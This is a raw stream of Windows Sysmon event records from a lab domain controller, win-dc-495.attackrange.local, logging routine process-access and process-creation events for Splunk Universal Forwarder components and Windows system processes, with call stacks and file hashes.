14:07:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.392{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:45.392{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.392{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.392{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.391{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.802{59A5CD1D-9632-6005-7605-00000000A301}59164100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.657{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.219{59A5CD1D-9632-6005-7505-00000000A301}63326400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.922{59A5CD1D-9634-6005-7805-00000000A301}65526672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 